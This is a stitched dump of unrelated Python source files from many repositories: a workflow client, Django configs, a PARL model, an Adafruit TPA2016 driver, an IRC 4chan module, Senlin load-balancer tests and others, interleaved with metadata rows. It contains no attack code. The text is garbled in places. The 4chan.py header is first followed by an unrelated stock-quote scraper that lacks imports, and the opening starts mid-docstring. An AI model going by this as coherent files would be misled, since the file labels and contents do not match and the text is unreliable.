The ID of the `Workflow`.
version: str
The version of the `Workflow` that you wish to fetch.
client: `.workflows.client.Client`, optional
Allows you to use a specific client instance with non-default
auth and parameters.
Returns
-------
VersionedGraft
"""
if client is None:
client = get_global_grpc_client()
req = workflow_pb2.GetVersionRequest(id=workflow_id, version=version)
versioned_graft_message = client.api["GetVersion"](
req, timeout=client.DEFAULT_TIMEOUT
)
return cls._from_proto(versioned_graft_message)
@classmethod
def _from_proto(cls, message):
"""
Low-level constructor for a `VersionedGraft` object from a Protobuf message.
Do not use this method directly; use `VersionedGraft.__init__`
or `VersionedGraft.get` instead.
Parameters
----------
proto_message: workflow_pb2.VersionedGraft message
Protobuf message for the VersionedGraft
Returns
-------
VersionedGraft
"""
obj = cls.__new__(cls) # bypass __init__
obj._message = message
obj._object = None
return obj
@property
def type(self):
"""type: The type of the proxy object."""
return type(self.object)
@property
def version(self):
"""str: The version of this `VersionedGraft`."""
return self._message.version
@property
def labels(self):
"""dict: The labels attached to this `VersionedGraft`."""
return self._message.labels
@property
def channel(self):
"""str: The channel under which this `VersionedGraft` was created."""
return self._message.channel
@property
def docstring(self):
"""str: The docstring for this `VersionedGraft`."""
return self._message.docstring
@property
def object(self):
"""
Proxytype: The proxy object of this Workflow.
Raises ValueError if the VersionedGraft is not compatible with the current channel.
"""
if self.channel != _channel.__channel__:
raise ValueError(
"This client is compatible with channel '{}', "
"but the VersionedGraft is only defined for channel '{}'.".format(
_channel.__channel__, self.channel
)
)
if self._object is None:
proxy_type = deserialize_typespec(self._message.typespec)
graft = json.loads(self._message.serialized_graft)
isolated = graft_client.isolate_keys(graft)
proxy_obj = proxy_type._from_graft(isolated)
proxy_obj.__doc__ = self.docstring
self._object = proxy_obj
return self._object
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self._message == other._message
def __repr__(self):
return """\
VersionedGraft: {self.version}
- type: {self.type.__name__}
- labels: {self.labels}
- channel: {self.channel}
{docstring}
""".format(
self=self, docstring=textwrap.indent(self.docstring, " ")
)
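# Usage sketch (added; "my-workflow" and "1.0.0" are hypothetical IDs):
#
#     vg = VersionedGraft.get("my-workflow", "1.0.0")
#     vg.object   # the deserialized proxy object, if the channel matches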
# === file: /Exercicios&cursos/Curso_Py/escrevendo_arquivo.py | repo: antonioleitebr1968/Estudos-e-Projetos-Python | no license | 170 bytes ===
arq = open("teste_aula.txt", "w")  # "w" opens the file for writing
arq.write("escreviiiiiiii\n")
arq.write("dnvvvvvvvvvvv\n")
arq.write("HAHAHA CHUPA")
arq.write("UHUUUUUU")
arq.close()
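# Note (added): a context manager would close the file automatically, e.g.:
#
#     with open("teste_aula.txt", "w") as arq:
#         arq.write("escreviiiiiiii\n")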
# === file: /djangoProject/mysite/Profile/admin.py | repo: valiok98/Python-Qt5-Tensorflow | no license | 301 bytes ===
from django.contrib import admin
# Register your models here.
from .models import PersonalProfile, Item
class PProfile(admin.ModelAdmin):
list_display = ["f_name","l_name"]
class Meta:
model = PersonalProfile
admin.site.register(PersonalProfile,PProfile)
admin.site.register(Item)
# === file: /examples/tutorials/homework/lesson3/dqn_mountaincar/model.py | repo: PaddlePaddle/PARL | license: Apache-2.0 | 1,140 bytes ===
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#-*- coding: utf-8 -*-
import parl
from parl import layers  # wraps the paddle.fluid.layers API
class Model(parl.Model):
def __init__(self, act_dim):
hid1_size = 128
hid2_size = 128
        # three-layer fully connected network
self.fc1 = layers.fc(size=hid1_size, act='relu')
self.fc2 = layers.fc(size=hid2_size, act='relu')
self.fc3 = layers.fc(size=act_dim, act=None)
def value(self, obs):
h1 = self.fc1(obs)
h2 = self.fc2(h1)
Q = self.fc3(h2)
return Q
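# Usage sketch (added): MountainCar-v0 exposes 3 discrete actions, so the
# Q-network for this homework would be built as:
#
#     model = Model(act_dim=3)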
# === file: /blog/urls.py | repo: hemor/my-first-blog | no license | 873 bytes ===
from django.conf.urls import url
from . import views
app_name = 'blog'
urlpatterns = [
url(r'^$', views.post_list, name='post_list'),
url(r'^index/$', views.post_list, name='index'),
url(r'^post/(?P<pk>\d+)/$', views.post_detail, name='post_detail'),
url(r'^post/(?P<pk>\d+)/comment/$', views.add_comment_to_post,
name='add_comment_to_post'),
url(r'^post/(?P<pk>\d+)/edit/$', views.post_edit, name='post_edit'),
url(r'^post/(?P<pk>\d+)/publish/$', views.post_publish, name='post_publish'),
url(r'^post/(?P<pk>\d+)/delete/$', views.post_delete, name='post_delete'),
url(r'^post/new/$', views.post_new, name='post_new'),
url(r'^drafts/$', views.post_draft_list, name='post_draft_list'),
url(r'^comment/(?P<pk>\d+)/approve/$', views.comment_approve, name='comment_approve'),
url(r'^comment/(?P<pk>\d+)/delete/$', views.comment_delete, name='comment_delete'),
]
# === file: /Cura/Uranium/UM/Operations/AddSceneNodeOperation.py | repo: flight7788/3d-printing-with-moveo-1 | license: LGPL-3.0-only / GPL-3.0-only | 1,597 bytes ===
# Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Operations.Operation import Operation
from UM.Scene.Selection import Selection
from UM.Scene.SceneNode import SceneNode
from typing import Optional
## Operation that adds a new node to the scene.
class AddSceneNodeOperation(Operation):
## Creates the scene node operation.
#
# This saves the node and its parent to be able to search for the node to
# remove the node if we want to undo, and to be able to re-do the adding
# of the node.
#
# \param node The node to add to the scene.
# \param parent The parent of the new node.
def __init__(self, node: SceneNode, parent: Optional[SceneNode]) -> None:
super().__init__()
self._node = node
self._parent = parent
self._selected = False # Was the node selected while the operation is undone? If so, we must re-select it when redoing it.
## Reverses the operation of adding a scene node.
#
# This removes the scene node again.
def undo(self) -> None:
self._node.setParent(None)
self._selected = Selection.isSelected(self._node)
if self._selected:
Selection.remove(self._node) # Also remove the node from the selection.
## Re-applies this operation after it has been undone.
def redo(self) -> None:
self._node.setParent(self._parent)
if self._selected: # It was selected while the operation was undone. We should restore that selection.
Selection.add(self._node)
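# Usage sketch (added; ``parent_node`` is a hypothetical existing scene node):
#
#     op = AddSceneNodeOperation(SceneNode(), parent_node)
#     op.redo()   # adds the node under parent_node
#     op.undo()   # removes it again, remembering any selection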
# === file: /adafruit_tpa2016.py | repo: kattni/Adafruit_CircuitPython_TPA2016 | license: MIT | 9,955 bytes ===
# The MIT License (MIT)
#
# Copyright (c) 2019 Kattni Rembor for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_tpa2016`
================================================================================
CircuitPython driver for TPA2016 Class D Amplifier.
* Author(s): Kattni Rembor
Implementation Notes
--------------------
**Hardware:**
* `Adafruit TPA2016 - I2C Control AGC <https://www.adafruit.com/product/1712>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library: https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
* Adafruit's Register library: https://github.com/adafruit/Adafruit_CircuitPython_Register
"""
from micropython import const
import adafruit_bus_device.i2c_device as i2cdevice
from adafruit_register.i2c_bits import RWBits
from adafruit_register.i2c_bit import RWBit
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_TPA2016.git"
class TPA2016:
"""Driver for the TPA2016 class D amplifier.
:param busio.I2C i2c_bus: The I2C bus the TPA2016 is connected to.
"""
# Compression ratio settings
COMPRESSION_1_1 = const(0x0) # Ratio 1:1
COMPRESSION_2_1 = const(0x1) # Ratio 2:1
COMPRESSION_4_1 = const(0x2) # Ratio 4:1
COMPRESSION_8_1 = const(0x3) # Ratio 8:1
# NoiseGate threshold settings
NOISE_GATE_1 = const(0x0) # 1mV
NOISE_GATE_4 = const(0x1) # 4mV
NOISE_GATE_10 = const(0x2) # 10mV
NOISE_GATE_20 = const(0x3) # 20mV
_attack_control = RWBits(6, 0x02, 0)
_release_control = RWBits(6, 0x03, 0)
_hold_time_control = RWBits(6, 0x04, 0)
_fixed_gain_control = RWBits(6, 0x05, 0)
_output_limiter_level = RWBits(5, 0x05, 0)
_max_gain = RWBits(4, 0x07, 4)
speaker_enable_r = RWBit(0x01, 7)
"""Enables right speaker. Defaults to enabled. Set to ``False`` to disable."""
speaker_enable_l = RWBit(0x01, 6)
"""Enables left speaker. Defaults to enabled. Set to ``False`` to disable."""
amplifier_shutdown = RWBit(0x01, 5)
"""Amplifier shutdown. Amplifier is disabled if ``True``. Defaults to ``False``. If ``True``,
device is in software shutdown, e.g. control, bias and oscillator are inactive."""
reset_fault_r = RWBit(0x01, 4)
"""Over-current event on right channel indicated by returning ``True``. Reset by setting to
``False``."""
reset_Fault_l = RWBit(0x01, 3)
"""Over-current event on left channel indicated by returning ``True``. Reset by setting to
``False``."""
reset_thermal = RWBit(0x01, 2)
"""Thermal software shutdown indicated by returning ``True``. Reset by setting to ``False``."""
noise_gate_enable = RWBit(0x01, 0)
"""NoiseGate function enable. Enabled by default. Can only be enabled when compression ratio
is NOT 1:1. To disable, set to ``False``."""
output_limiter_disable = RWBit(0x06, 7)
"""Output limiter disable. Enabled by default when compression ratio is NOT 1:1. Can only be
disabled if compression ratio is 1:1. To disable, set to ``True``."""
noise_gate_threshold = RWBits(2, 0x06, 5)
"""Noise Gate threshold in mV. Noise gate settings are 1mV, 4mV, 10mV, and 20mV. Settings
options are NOISE_GATE_1, NOISE_GATE_4, NOISE_GATE_10, NOISE_GATE_20. Only functional when
compression ratio is NOT 1:1. Defaults to 4mV.
This example sets the noise gate threshold to 10mV.
    .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.noise_gate_threshold = tpa.NOISE_GATE_10
"""
compression_ratio = RWBits(2, 0x07, 0)
"""The compression ratio. Ratio settings are: 1:1. 2:1, 4:1, 8:1. Settings options are:
COMPRESSION_1_1, COMPRESSION_2_1, COMPRESSION_4_1, COMPRESSION_8_1. Defaults to 4:1.
This example sets the compression ratio to 2:1.
    .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.compression_ratio = tpa.COMPRESSION_2_1
"""
def __init__(self, i2c_bus):
self.i2c_device = i2cdevice.I2CDevice(i2c_bus, 0x58)
@property
def attack_time(self):
"""The attack time. This is the minimum time between gain decreases. Set to ``1`` - ``63``
where 1 = 0.1067ms and the time increases 0.1067ms with each step, for a maximum of 6.722ms.
Defaults to 5, or 0.5335ms.
This example sets the attack time to 1, or 0.1067ms.
        .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.attack_time = 1
"""
return self._attack_control
@attack_time.setter
def attack_time(self, value):
if 1 <= value <= 63:
self._attack_control = value
else:
raise ValueError("Attack time must be 1 to 63!")
@property
def release_time(self):
"""The release time. This is the minimum time between gain increases. Set to ``1`` - ``63``
where 1 = 0.0137ms, and the time increases 0.0137ms with each step, for a maximum of
0.8631ms. Defaults to 11, or 0.1507ms.
This example sets release time to 1, or 0.0137ms.
        .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.release_time = 1
"""
return self._release_control
@release_time.setter
def release_time(self, value):
if 1 <= value <= 63:
self._release_control = value
else:
raise ValueError("Release time must be 1 to 63!")
@property
def hold_time(self):
"""The hold time. This is the minimum time between attack and release. Set to ``0`` -
``63`` where 0 = disabled, and the time increases 0.0137ms with each step, for a maximum of
0.8631ms. Defaults to 0, or disabled.
This example sets hold time to 1, or 0.0137ms.
        .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.hold_time = 1
"""
return self._hold_time_control
@hold_time.setter
def hold_time(self, value):
if 0 <= value <= 63:
self._hold_time_control = value
else:
raise ValueError("Hold time must be 0 to 63!")
@property
def fixed_gain(self):
"""The fixed gain of the amplifier in dB. If compression is enabled, fixed gain is
        adjustable from ``-28`` to ``30``. If compression is disabled, fixed gain is adjustable
from ``0`` to ``30``.
The following example sets the fixed gain to -16dB.
        .. code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.fixed_gain = -16
"""
return self._fixed_gain_control
@fixed_gain.setter
def fixed_gain(self, value):
        if self.compression_ratio != 0:
if -28 <= value <= 30:
ratio = (value & 0x3f)
self._fixed_gain_control = ratio
else:
raise ValueError("Gain must be -28 to 30!")
else:
if 0 <= value <= 30:
self._fixed_gain_control = value
else:
raise ValueError("Compression is disabled, gain must be 0 to 30!")
@property
def output_limiter_level(self):
"""The output limiter level in dBV. Must be between ``-6.5`` and ``9``, set in increments
of 0.5."""
return -6.5 + 0.5 * self._output_limiter_level
@output_limiter_level.setter
def output_limiter_level(self, value):
if -6.5 <= value <= 9:
output = int((value + 6.5) / 0.5)
self._output_limiter_level = output
else:
raise ValueError("Output limiter level must be -6.5 to 9!")
@property
def max_gain(self):
"""The max gain in dB. Must be between ``18`` and ``30``."""
return self._max_gain + 18
@max_gain.setter
def max_gain(self, value):
if 18 <= value <= 30:
max_value = value - 18
self._max_gain = max_value
else:
raise ValueError("Max gain must be 18 to 30!")
# === file: /irc/asparagus/modules/4chan.py | repo: moneytech/code-2 | license: Zlib | 2,174 bytes ===
"""
import json
import os
import socket
import sys
import time
import urllib2
tracking_list = ['sh000001', 'sz399001', 'sz399300']
foo = {}
try:
with open('./data/dbf/overview.dbf', 'r') as dbf:
foo = json.load(dbf)
except IOError:
foo['layout'] = ['DATE', 'TCLOSE','HIGH','LOW','TOPEN','LCLOSE','CHG','PCHG','TURNOVER','VOTURNOVER','VATURNOVER','TCAP','MCAP']
foo['record'] = {}
x = 0
y = len(tracking_list)
for code in tracking_list:
first = '19910101'
if code not in foo['record']:
foo['record'][code] = []
elif len(foo['record'][code])>0:
tmp = time.strptime(foo['record'][code][0][0], '%Y-%m-%d')
nxt = datetime.date(tmp.tm_year, tmp.tm_mon, tmp.tm_mday) + datetime.timedelta(1)
first = nxt.strftime('%Y%m%d')
code163 = code.replace('sh', '0').replace('sz', '1')
url = 'http://quotes.money.163.com/service/chddata.html?code=%s&start=%s&end=20380119&fields=TCLOSE;HIGH;LOW;TOPEN;LCLOSE;CHG;PCHG;TURNOVER;VOTURNOVER;VATURNOVER;TCAP;MCAP' % (code163, first)
rep = None
raw = None
sup = 0.0
while True:
try:
rep = urllib2.urlopen(url, timeout=1)
raw = list(csv.reader(rep))
except (urllib2.URLError, socket.error, socket.timeout) as e:
sup += 0.2
time.sleep(sup)
continue
break
bunk = []
for row in raw[1:]:
contents = [row[0]]
for i in xrange(3, 15):
cell = row[i]
if cell != '':
if cell != 'None':
cell = float(cell)
else:
cell = None
else:
cell = 0.0
contents.append(cell)
bunk.append(contents)
foo['record'][code] = bunk + foo['record'][code]
x += 1
print '%d/%d + %d' % (x, y, len(bunk))
sys.stdout.flush()
#time.sleep(0.2)
with open('./data/dbf/overview.dbf', 'w') as dbf:
json.dump(foo, dbf)
print 'dbf have been written successfully'
sys.stdout.flush()
| [
"[email protected]"
] | |
4661574ed6bcbdbcb9e401e4121736a4c790d8e6 | 0131f6d91da5b063b3d79330b014871c128c67ed | /irc/asparagus/modules/4chan.py | ebb414e01e4aa3612a6cdb9b84448a46a5a2afc9 | [
"Zlib"
] | permissive | moneytech/code-2 | f31602a702cc7e13b24c1ab5817d30d2314dde76 | d970038329f7c4e4f0ee9dcd1b345741dd0fcc51 | refs/heads/master | 2021-10-02T18:24:20.159492 | 2018-11-30T02:14:18 | 2018-11-30T02:14:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | """
Copyright (c) 2013, Christine Dodrill
All rights reserved.
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source
distribution.
"""
import requests
import re
NAME="4chan lookups"
DESC="4chan post info lookups"
FOURCHAN_REGEX = re.compile('(.+boards\.)4chan\.org\/([a-z0-9]+)\/res\/([1-9][0-9]+)')
def initModule(cod):
cod.s2scommands["PRIVMSG"].append(fourchanLookup)
def destroyModule(cod):
cod.s2scommands["PRIVMSG"].remove(fourchanLookup)
def rehash():
pass
def fourchanLookup(cod, line):
"""
This uses requests to scrape out things from the 4chan API
"""
global FOURCHAN_REGEX
if line.args[0] not in cod.channels:
return
chatline = line.args[-1]
postid = None
try:
board = FOURCHAN_REGEX.split(chatline)[2]
postid = FOURCHAN_REGEX.split(chatline)[3]
    except:
        # the message did not contain a 4chan thread URL; nothing to do
        return
try:
info = requests.get("http://api.4chan.org/%s/res/%s.json" % (board, postid)).json()
text = info["posts"][0]["com"].split("<br>")[0]
text = text.replace('<span class="quote">>', ">")
text = text.replace("</span>", "")
string = "^ fourchan: %s on /%s/ - %s" %\
(info["posts"][0]["name"], board, text)
cod.privmsg(line.args[0], string)
except Exception as e:
cod.privmsg(line.args[0], "There was some error looking up that post: %s" % e.message)
| [
"[email protected]"
] | |
3b3693eadafb982f2084a294eca435e9ca20ceee | 67bdebd561b19af9bf759b6ed5de8556b93ea91f | /trace_unless.py | f02ba6959a7ce84d5162f521cd3b15b0d53a8b8d | [] | no_license | rlowrance/re-avm | 91371ec79f6b6f48e17643da4dfb7a4894d0a0ca | d4cfa62e9f65d325e8ac98caa61d3fb666b8a6a2 | refs/heads/master | 2021-01-17T07:34:16.876133 | 2017-02-06T21:04:59 | 2017-02-06T21:04:59 | 42,865,972 | 31 | 10 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | import pdb
def trace_unless(condition, message, **kwds):
'like assert condition, message; but enters debugger if condition fails'
if condition:
return
print '+++++++++++++++'
for k, v in kwds.iteritems():
print k, v
print message
print '+++++++++++++++'
pdb.set_trace()
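if __name__ == '__main__':
    # usage sketch (added): a passing check returns silently; a failing one
    # prints the keyword context and message, then drops into pdb.
    trace_unless(1 + 1 == 2, 'arithmetic is broken', lhs=1, rhs=1)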
| [
"[email protected]"
] | |
01f9a0bdf77391ac938617afd13a6195299dafb5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /Wpbb6x9nHax55zKLX_14.py | 8e96679b72e16f74a7456684857920bfe30cdea7 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | """
In many cases, **SQL** is used to select more than just columns in a table.
For example, you can filter your search by specifying conditions as seen
below:
SELECT * FROM Table
WHERE Name = "Bob";
* Again, we can use the asterisk (`*`) to select all the data in a table.
* However, with the use of the WHERE keyword, only Bob's data is selected.
Name| Salary
---|---
Bob| 30000
In this challenge, fill in the query in the **Code** tab to select the
`Salary` from "Adam" in the `Employees` table.
### Original Table
Name| Salary
---|---
Adam| 50000
Bob| 30000
Charlotte| 45000
Dillon| 70000
Eileen| 70000
### Expected Results
Salary
---
50000
### Notes
* Check out the **Resources** tab for more SQL tutorials and exercises.
* When presented with more complex queries like this, it is best practice to format your code by putting each statement on separate lines!
* See the rest of the challenges in this series [here!](https://edabit.com/collection/ZEmuGy8zxzDQdBb5o)
"""
query = "SELECT salary FROM employees WHERE name = 'Adam'"
| [
"[email protected]"
] | |
52d6fc860067cda559eaca821a47486d2e8644ac | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /CMFDefault/Extensions/update_catalogIndexes.py | c86903bdb2a56bf53134126924f3d2287a8708e7 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from Products.CMFCore.utils import getToolByName
def update_catalogIndexes(self, REQUEST):
'''
External method to drop, re-add, and rebuild catalog Indexes for migrated
CMF sites from Zope 2.3 to 2.4+.
'''
rIndexes = {'allowedRolesAndUsers': 'KeywordIndex'
, 'effective': 'FieldIndex'
, 'expires': 'FieldIndex'}
ct = getToolByName(self, 'portal_catalog')
map(lambda x, ct=ct: ct.delIndex(x), rIndexes.keys())
map(lambda x, ct=ct: ct.addIndex(x[0], x[1]), rIndexes.items())
ct.manage_reindexIndex(ids=rIndexes.keys(), REQUEST=REQUEST)
return 'Catalog Indexes rebuilt.'
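# --- illustrative note (added; not part of the original method) ---
# The map(lambda ...) calls above are a Python 2 idiom for plain loops;
# the first one is equivalent to:
#   for name in rIndexes.keys():
#       ct.delIndex(name)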
| [
"[email protected]"
] | |
a519cbe8ed2abdf0645b211d1492e3723c52e6c2 | c2bdcd5aec95d5c4ac4322f166c2ef9b2b8992f9 | /kurstag_8/beispiele_8/Vehicle2.py | 9a0bd64199b7f79a94416879935e99e849ee1964 | [] | no_license | softborg/Python_HWZ_Start | 4437c5d8676301db8f4c42b75c98f0cc91320012 | 6361647113365df66e3ad84a0d1d1b563137ebbd | refs/heads/master | 2022-07-21T16:27:30.333598 | 2022-07-12T12:08:37 | 2022-07-12T12:08:37 | 252,724,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24 | py | class Vehicle:
pass
| [
"[email protected]"
] | |
2bfa12840166c969a9cdab6b15d1371191c6a2c6 | 5a281cb78335e06c631181720546f6876005d4e5 | /senlin-7.0.0/senlin/tests/unit/drivers/test_lbaas.py | 1bdc0d366f64a91318ae7c63fb4bef33cd72bff5 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 29,598 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from oslo_context import context as oslo_context
from senlin.common import exception
from senlin.common.i18n import _
from senlin.drivers.os import lbaas
from senlin.drivers.os import neutron_v2
from senlin.drivers.os import octavia_v2
from senlin.engine import node as nodem
from senlin.tests.unit.common import base
from senlin.tests.unit.common import utils
class TestOctaviaLBaaSDriver(base.SenlinTestCase):
def setUp(self):
super(TestOctaviaLBaaSDriver, self).setUp()
self.context = utils.dummy_context()
self.conn_params = self.context.to_dict()
self.lb_driver = lbaas.LoadBalancerDriver(self.conn_params)
self.lb_driver.lb_status_timeout = 10
self.patchobject(neutron_v2, 'NeutronClient')
self.patchobject(octavia_v2, 'OctaviaClient')
self.nc = self.lb_driver.nc()
self.oc = self.lb_driver.oc()
self.vip = {
'subnet': 'subnet-01',
'address': '192.168.1.100',
'admin_state_up': True,
'protocol': 'HTTP',
'protocol_port': 80,
'connection_limit': 50
}
self.pool = {
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'admin_state_up': True
}
self.hm = {
"type": "HTTP",
"delay": "1",
"timeout": 1,
"max_retries": 5,
"pool_id": "POOL_ID",
"admin_state_up": True,
"http_method": "GET",
"url_path": "/index.html",
"expected_codes": "200,201,202"
}
def test_init(self):
conn_params = self.context.to_dict()
conn_params['lb_status_timeout'] = 10
res = lbaas.LoadBalancerDriver(conn_params)
self.assertEqual(conn_params, res.conn_params)
self.assertIsNone(res._nc)
@mock.patch.object(neutron_v2, 'NeutronClient')
def test_nc_initialize(self, mock_neutron_client):
conn_params = self.context.to_dict()
conn_params['lb_status_timeout'] = 10
fake_nc = mock.Mock()
mock_neutron_client.return_value = fake_nc
lb_driver = lbaas.LoadBalancerDriver(conn_params)
self.assertIsNone(lb_driver._nc)
# Create a new NeutronClient
res = lb_driver.nc()
mock_neutron_client.assert_called_once_with(conn_params)
self.assertEqual(fake_nc, res)
# Use the existing NeutronClient stored in self._nc
fake_nc_new = mock.Mock()
mock_neutron_client.return_value = fake_nc_new
res1 = lb_driver.nc()
mock_neutron_client.assert_called_once_with(conn_params)
self.assertNotEqual(fake_nc_new, res1)
self.assertEqual(res, res1)
def test_wait_for_lb_ready(self):
lb_id = 'ID1'
lb_obj = mock.Mock()
lb_obj.id = lb_id
lb_obj.provisioning_status = 'ACTIVE'
lb_obj.operating_status = 'ONLINE'
self.oc.loadbalancer_get.return_value = lb_obj
res = self.lb_driver._wait_for_lb_ready(lb_id)
self.assertTrue(res)
def test_wait_for_lb_ready_ignore_not_found(self):
lb_id = 'LB_ID'
self.oc.loadbalancer_get.return_value = None
res = self.lb_driver._wait_for_lb_ready(lb_id, ignore_not_found=True)
self.assertTrue(res)
@mock.patch.object(eventlet, 'sleep')
def test_wait_for_lb_ready_timeout(self, mock_sleep):
lb_id = 'LB_ID'
lb_obj = mock.Mock(id=lb_id)
self.oc.loadbalancer_get.return_value = lb_obj
lb_obj.provisioning_status = 'PENDING_UPDATE'
lb_obj.operating_status = 'OFFLINE'
res = self.lb_driver._wait_for_lb_ready(lb_id)
self.assertFalse(res)
mock_sleep.assert_called_once_with(10)
def test_lb_create_succeeded(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
hm_obj = mock.Mock()
lb_obj.id = 'LB_ID'
lb_obj.vip_address = '192.168.1.100'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
hm_obj.id = 'HEALTHMONITOR_ID'
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.oc.healthmonitor_create.return_value = hm_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertTrue(status)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.assertEqual('LB_ID', res['loadbalancer'])
self.assertEqual('192.168.1.100', res['vip_address'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.assertEqual('LISTENER_ID', res['listener'])
self.oc.pool_create.assert_called_once_with(
self.pool['lb_method'], 'LISTENER_ID', self.pool['protocol'],
self.pool['admin_state_up'])
self.assertEqual('POOL_ID', res['pool'])
self.oc.healthmonitor_create.assert_called_once_with(
self.hm['type'], self.hm['delay'], self.hm['timeout'],
self.hm['max_retries'], 'POOL_ID', self.hm['admin_state_up'],
self.hm['http_method'], self.hm['url_path'],
self.hm['expected_codes'])
self.assertEqual('HEALTHMONITOR_ID', res['healthmonitor'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
calls = [mock.call('LB_ID') for i in range(1, 5)]
self.lb_driver._wait_for_lb_ready.assert_has_calls(
calls, any_order=False)
def test_lb_create_loadbalancer_creation_failed(self):
lb_obj = mock.Mock()
lb_obj.id = 'LB_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
